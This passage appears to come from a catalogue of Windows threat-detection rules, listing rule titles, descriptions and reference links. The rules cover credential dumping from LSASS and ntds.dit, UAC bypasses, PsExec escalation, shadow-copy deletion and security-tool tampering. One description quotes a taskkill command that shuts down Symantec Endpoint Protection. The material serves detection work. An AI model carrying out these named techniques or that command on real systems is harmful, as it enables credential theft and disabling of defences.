https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://pentestlab.blog/tag/ntds-dit/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1, https://github.com/zcgonvh/NTDSDumpEx, https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1, https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 |
Potentially Suspicious Call To Win32_NTEventlogFile Class |
Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script |
https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) |
Use Short Name Path in Command Line |
Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection |
https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/frack113/status/1555830623633375232 |
Use Short Name Path in Image |
Detects use of the Windows 8.3 short name, which could be used as a method to avoid Image-based detection |
https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/frack113/status/1555830623633375232 |
Use NTFS Short Name in Command Line |
Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection |
https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/jonasLyk/status/1555914501802921984 |
Use NTFS Short Name in Image |
Detects use of the Windows 8.3 short name, which could be used as a method to avoid Image-based detection |
https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/jonasLyk/status/1555914501802921984 |
Obfuscated IP Download Activity |
Detects use of an encoded/obfuscated version of an IP address (hex, octal, etc.) in a URL combined with a download command |
https://h.43z.one/ipconverter/, https://twitter.com/Yasser_Elsnbary/status/1553804135354564608, https://twitter.com/fr0s7_/status/1712780207105404948 |
Obfuscated IP Via CLI |
Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line |
https://h.43z.one/ipconverter/, https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 |
Suspicious Process Parents |
Detects suspicious parent processes that should not have any children or should only have a single possible child program |
https://twitter.com/x86matthew/status/1505476263464607744?s=12, https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b |
Private Keys Reconnaissance Via CommandLine Tools |
Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md |
Potential PowerShell Execution Via DLL |
Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
This detection assumes that PowerShell commands are passed via the CommandLine.
|
https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md |
Suspicious RunAs-Like Flag Combination |
Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools |
https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html |
Privilege Escalation via Named Pipe Impersonation |
Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. |
https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html |
Windows Processes Suspicious Parent Directory |
Detect suspicious parent processes of well-known Windows processes |
https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2, https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/, https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf |
Suspicious Program Names |
Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
Recon Information for Export with Command Prompt |
Once established within a system or network, an adversary may use automated techniques for collecting internal data. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md |
Suspicious Process Execution From Fake Recycle.Bin Folder |
Detects process execution from a fake recycle bin folder, often used to avoid security solutions. |
https://www.mandiant.com/resources/blog/infected-usb-steal-secrets, https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ |
Suspicious Redirection to Local Admin Share |
Detects a suspicious output redirection to the local admin share; this technique is often found in malicious scripts or hacktool stagers |
https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html |
Potential Remote Desktop Tunneling |
Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. |
https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html |
Potential Defense Evasion Via Right-to-Left Override |
Detects the presence of the "U+202E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
This is used as an obfuscation and masquerading technique.
|
https://redcanary.com/blog/right-to-left-override/, https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method, https://unicode-explorer.com/c/202E |
Script Interpreter Execution From Suspicious Folder |
Detects a suspicious script execution in temporary folders or folders accessible by environment variables |
https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military, https://learn.microsoft.com/en-us/windows/win32/shell/csidl |
Suspicious Script Execution From Temp Folder |
Detects suspicious script executions from a temporary folder |
https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ |
Sensitive File Access Via Volume Shadow Copy Backup |
Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
|
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ |
Suspicious New Service Creation |
Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html |
Suspicious Service Binary Directory |
Detects a service binary running in a suspicious directory |
https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ |
Shadow Copies Creation Using Operating Systems Utilities |
Detects shadow copy creation using operating system utilities, which may indicate credential access |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/ |
Suspicious Windows Service Tampering |
Detects the usage of binaries such as 'net', 'sc' or 'powershell' to stop, pause, disable or delete critical or important Windows services such as AV, backup, etc., as seen in some ransomware scripts
|
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg, https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 |
System File Execution Location Anomaly |
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
|
https://twitter.com/GelosSnake/status/934900723426439170, https://asec.ahnlab.com/en/39828/ |
Shadow Copies Deletion Using Operating Systems Utilities |
Detects shadow copy deletion using operating system utilities |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://blog.talosintelligence.com/2017/05/wannacry.html, https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/, https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/, https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100, https://github.com/Neo23x0/Raccine#the-process, https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar, https://redcanary.com/blog/intelligence-insights-october-2021/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware |
Windows Shell/Scripting Processes Spawning Suspicious Programs |
Detects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc. |
https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html |
Suspicious SYSTEM User Process Creation |
Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) |
Internal Research, https://tools.thehacker.recipes/mimikatz/modules |
Suspicious SYSVOL Domain Group Policy Access |
Detects Access to Domain Group Policies stored in SYSVOL |
https://adsecurity.org/?p=2288, https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100 |
Tasks Folder Evasion |
The Tasks folders in system32 and syswow64 are globally writable paths.
Adversaries can take advantage of this to load or influence any script host or ANY .NET application
in Tasks, loading and executing a custom assembly into cscript, wscript, regsvr32, mshta or eventvwr
|
https://twitter.com/subTee/status/1216465628946563073, https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26 |
Process Creation Using Sysnative Folder |
Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) |
https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ |
Suspicious Userinit Child Process |
Detects a suspicious child process of userinit |
https://twitter.com/SBousseaden/status/1139811587760562176 |
Malicious Windows Script Components File Execution by TAEF Detection |
The Windows Test Authoring and Execution Framework (TAEF) allows you to run automation by executing test files written in different languages (C, C#, Microsoft COM scripting interfaces).
Adversaries may execute malicious code (such as a WSC file with VBScript, a DLL and so on) directly by running te.exe
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/, https://twitter.com/pabraeken/status/993298228840992768, https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/ |
Malicious PE Execution by Microsoft Visual Studio Debugger |
The MS Visual Studio Just-In-Time Debugger "vsjitdebugger.exe" has an option to launch a specified executable and attach a debugger to it.
This option may be used by adversaries to execute malicious code via a signed, verified binary.
The debugger is installed alongside the Microsoft Visual Studio package.
|
https://twitter.com/pabraeken/status/990758590020452353, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/, https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019 |
Weak or Abused Passwords In CLI |
Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
An example would be a threat actor creating a new user via the net command and providing the password inline
|
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments, https://thedfirreport.com/2022/09/26/bumblebee-round-two/, https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
Usage Of Web Request Commands And Cmdlets |
Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine |
https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/, https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell, https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps |
WhoAmI as Parameter |
Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) |
https://twitter.com/blackarrowsec/status/1463805700602224645?s=12 |
Execution via WorkFolders.exe |
Detects using WorkFolders.exe to execute an arbitrary control.exe |
https://twitter.com/elliotkillick/status/1449812843772227588 |
Suspect Svchost Activity |
It is extremely abnormal for svchost.exe to spawn without any command-line arguments; this is normally observed when a malicious process spawns svchost.exe and injects code into its memory space. |
https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2 |
Suspicious Process Masquerading As SvcHost.EXE |
Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location.
Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
|
https://tria.ge/240731-jh4crsycnb/behavioral2, https://redcanary.com/blog/threat-detection/process-masquerading/ |
Terminal Service Process Spawn |
Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) |
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/ |
Uncommon Svchost Parent Process |
Detects an uncommon svchost parent process |
Internal Research |
Permission Check Via Accesschk.EXE |
Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by Sysinternals that is often abused by attackers to verify process privileges |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43, https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW, https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat, https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat |
Active Directory Database Snapshot Via ADExplorer |
Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. |
https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html |
Suspicious Active Directory Database Snapshot Via ADExplorer |
Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. |
https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html |
Potential Execution of Sysinternals Tools |
Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools |
https://twitter.com/Moti_B/status/1008587936735035392 |
Potential Memory Dumping Activity Via LiveKD |
Detects execution of LiveKD based on PE metadata or image name |
https://learn.microsoft.com/en-us/sysinternals/downloads/livekd |
Kernel Memory Dump Via LiveKD |
Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory |
https://learn.microsoft.com/en-us/sysinternals/downloads/livekd, https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/, https://kb.acronis.com/content/60892 |
Procdump Execution |
Detects usage of the SysInternals Procdump utility |
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump |
Potential SysInternals ProcDump Evasion |
Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name |
https://twitter.com/mrd0x/status/1480785527901204481 |
Potential LSASS Process Dump Via Procdump |
Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process.
This way we are also able to catch cases in which the attacker has renamed the procdump executable.
|
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump |
Psexec Execution |
Detects PsExec execution with the user agreement acceptance flag in the command line |
https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
PsExec/PAExec Escalation to LOCAL SYSTEM |
Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
Potential PsExec Remote Execution |
Detects potential PsExec commands that initiate execution on remote systems via common command-line flags used by the utility |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
PsExec Service Child Process Execution as LOCAL SYSTEM |
Detects a suspicious launch of the PSEXESVC service on this system together with a child process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system with the highest privileges rather than only the privileges of the logged-in user account (e.g. the administrator account) |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec |
PsExec Service Execution |
Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.youtube.com/watch?v=ro2QuZTIMBM |
Suspicious Use of PsLogList |
Detects usage of the PsLogList utility to dump event logs in order to extract admin accounts and perform account discovery, or to delete event logs |
https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/, https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos, https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList, https://twitter.com/EricaZelic/status/1614075109827874817 |
Sysinternals PsService Execution |
Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering |
https://learn.microsoft.com/en-us/sysinternals/downloads/psservice |
Sysinternals PsSuspend Execution |
Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes |
https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend, https://twitter.com/0gtweet/status/1638069413717975046 |
Sysinternals PsSuspend Suspicious Execution |
Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses |
https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend, https://twitter.com/0gtweet/status/1638069413717975046 |
Potential File Overwrite Via Sysinternals SDelete |
Detects the use of SDelete to erase a file rather than the free space |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md |
Potential Privilege Escalation To LOCAL SYSTEM |
Detects an unknown program using command-line flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM privileges |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.poweradmin.com/paexec/, https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html |
Sysmon Configuration Update |
Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare-bones one to avoid monitoring without shutting down the service completely |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon |
Uninstall Sysinternals Sysmon |
Detects the removal of Sysmon, which could be a potential attempt at defense evasion |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon |
Potential Binary Impersonating Sysinternals Tools |
Detects binaries that use the same name as legitimate sysinternals tools to evade detection |
https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite |
Sysprep on AppData Folder |
Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) |
https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets, https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b |
Suspicious Execution of Systeminfo |
Detects usage of the "systeminfo" command to retrieve information |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo |
Potential Signing Bypass Via Windows Developer Features |
Detects when a user enables developer features such as "Developer Mode" or "Application Sideloading", which allow the user to install untrusted packages. |
Internal Research, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ |
Suspicious Recursive Takeown |
Adversaries can interact with DACLs using the built-in Windows command takeown, which can grant them higher permissions on specific files and folders |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility |
Tap Installer Execution |
Detects installation of well-known TAP software, a possible preparation for data exfiltration using tunneling techniques |
https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers |
Compressed File Creation Via Tar.EXE |
Detects execution of "tar.exe" in order to create a compressed file.
Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
|
https://unit42.paloaltonetworks.com/chromeloader-malware/, https://lolbas-project.github.io/lolbas/Binaries/Tar/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage |
Compressed File Extraction Via Tar.EXE |
Detects execution of "tar.exe" in order to extract a compressed file.
Adversaries may abuse various utilities in order to decompress data to avoid detection.
|
https://unit42.paloaltonetworks.com/chromeloader-malware/, https://lolbas-project.github.io/lolbas/Binaries/Tar/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage |
Taskkill Symantec Endpoint Protection |
Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
As a result, the NT AUTHORITY/SYSTEM user can execute the command taskkill /im ccSvcHst.exe /f several times, thereby killing the process belonging to the service and thus shutting down the service.
|
https://www.exploit-db.com/exploits/37525, https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection, https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer |
Loaded Module Enumeration Via Tasklist.EXE |
Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe".
This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question,
in order to dump the process memory or perform other nefarious actions.
|
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/, https://pentestlab.blog/tag/svchost/ |
Taskmgr as LOCAL_SYSTEM |
Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM |
Internal Research |
New Process Created Via Taskmgr.EXE |
Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC |
https://twitter.com/ReneFreingruber/status/1172244989335810049 |
Potentially Suspicious Command Targeting Teams Sensitive Files |
Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
The database might contain authentication tokens and other sensitive information about the logged-in accounts.
|
https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens |
Suspicious TSCON Start as SYSTEM |
Detects a tscon.exe start as LOCAL SYSTEM |
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html, https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6, https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement |
New Virtual Smart Card Created Via TpmVscMgr.EXE |
Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card. |
https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr |
Bypass UAC via CMSTP |
Detects command-line usage of the Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files |
https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md, https://lolbas-project.github.io/lolbas/Binaries/Cmstp/ |
Suspicious RDP Redirect Using TSCON |
Detects a suspicious RDP session redirect using tscon.exe |
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html, https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6, https://www.hackingarticles.in/rdp-session-hijacking-with-tscon/ |
UAC Bypass Using Disk Cleanup |
Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using ChangePK and SLUI |
Detects a UAC bypass that uses changepk.exe and slui.exe (UACMe 61) |
https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b, https://github.com/hfiref0x/UACME, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf |
CMSTP UAC Bypass via COM Object Access |
Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65) |
https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/, https://twitter.com/hFireF0X/status/897640081053364225, https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf, https://github.com/hfiref0x/UACME |
UAC Bypass Tools Using ComputerDefaults |
Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) |
https://github.com/hfiref0x/UACME |
Potential RDP Session Hijacking Activity |
Detects potential RDP Session Hijacking activity on Windows systems |
https://twitter.com/Moti_B/status/909449115477659651 |
UAC Bypass Using Consent and Comctl32 - Process |
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using DismHost |
Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) |
https://github.com/hfiref0x/UACME |
Bypass UAC via Fodhelper.exe |
Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. |
https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md |
UAC Bypass Using Event Viewer RecentViews |
Detects the pattern of UAC Bypass using Event Viewer RecentViews |
https://twitter.com/orange_8361/status/1518970259868626944, https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute |
UAC Bypass Using NTFS Reparse Point - Process |
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) |
https://github.com/hfiref0x/UACME |
UAC Bypass via ICMLuaUtil |
Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface |
https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html |
UAC Bypass Using IDiagnostic Profile |
Detects the "IDiagnosticProfileUAC" UAC bypass technique |
https://github.com/Wh04m1001/IDiagnosticProfileUAC |
UAC Bypass Using IEInstal - Process |
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) |
https://github.com/hfiref0x/UACME |
UAC Bypass via Windows Firewall Snap-In Hijack |
Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in |
https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack |
UAC Bypass Using MSConfig Token Modification - Process |
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using PkgMgr and DISM |
Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) |
https://github.com/hfiref0x/UACME |
Potential UAC Bypass Via Sdclt.EXE |
A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used in UAC bypass techniques. |
https://github.com/OTRF/detection-hackathon-apt29/issues/6, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md |
TrustedPath UAC Bypass Pattern |
Detects indicators of a UAC bypass method by mocking directories |
https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e, https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows, https://github.com/netero1010/TrustedPath-UACBypass-BOF |
UAC Bypass Abusing Winsat Path Parsing - Process |
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using Windows Media Player - Process |
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) |
https://github.com/hfiref0x/UACME |
Bypass UAC via WSReset.exe |
Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. |
https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html, https://lolbas-project.github.io/lolbas/Binaries/Wsreset/, https://www.activecyber.us/activelabs/windows-uac-bypass, https://twitter.com/ReaQta/status/1222548288731217921 |
UAC Bypass WSReset |
